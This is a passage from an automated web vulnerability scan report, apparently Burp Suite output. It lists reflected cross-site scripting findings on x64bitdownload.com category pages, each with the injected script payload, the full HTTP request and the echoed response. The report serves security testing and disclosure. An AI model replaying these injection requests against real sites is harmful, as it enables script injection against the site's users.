<input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1" />
...[SNIP]...

4.1689. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee9dc"><script>alert(1)</script>c8edc30f815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:37:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html" />
...[SNIP]...

4.1690. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5b9"><script>alert(1)</script>2ee9fead789 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789" />
...[SNIP]...

4.1691. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69348"><script>alert(1)</script>081516f460c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1" />
...[SNIP]...

4.1692. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343da"><script>alert(1)</script>afffd569a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:35:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html" />
...[SNIP]...

4.1693. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53512"><script>alert(1)</script>5772985df31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:57 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31" />
...[SNIP]...

4.1694. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6798"><script>alert(1)</script>34b8fd1d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1" />
...[SNIP]...

4.1695. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e35c"><script>alert(1)</script>7c5db426e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html" />
...[SNIP]...

4.1696. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6ea"><script>alert(1)</script>ea41a27d65e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e" />
...[SNIP]...

4.1697. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1e9"><script>alert(1)</script>3697cb785d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1" />
...[SNIP]...

4.1698. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7021b"><script>alert(1)</script>390428112e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:37:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html" />
...[SNIP]...

4.1699. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 203dc"><script>alert(1)</script>8b744dfd2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce" />
...[SNIP]...

4.1700. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410cf"><script>alert(1)</script>001936dc891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1" />
...[SNIP]...

4.1701. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff48"><script>alert(1)</script>712b29e0247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html" />
...[SNIP]...

4.1702. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88d4"><script>alert(1)</script>bde65231c50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50" />
...[SNIP]...

4.1703. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a91"><script>alert(1)</script>06180f2151b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1" />
...[SNIP]...

4.1704. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1be"><script>alert(1)</script>1593af6f4d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html" />
...[SNIP]...

4.1705. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca45"><script>alert(1)</script>88a1d2dd8e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

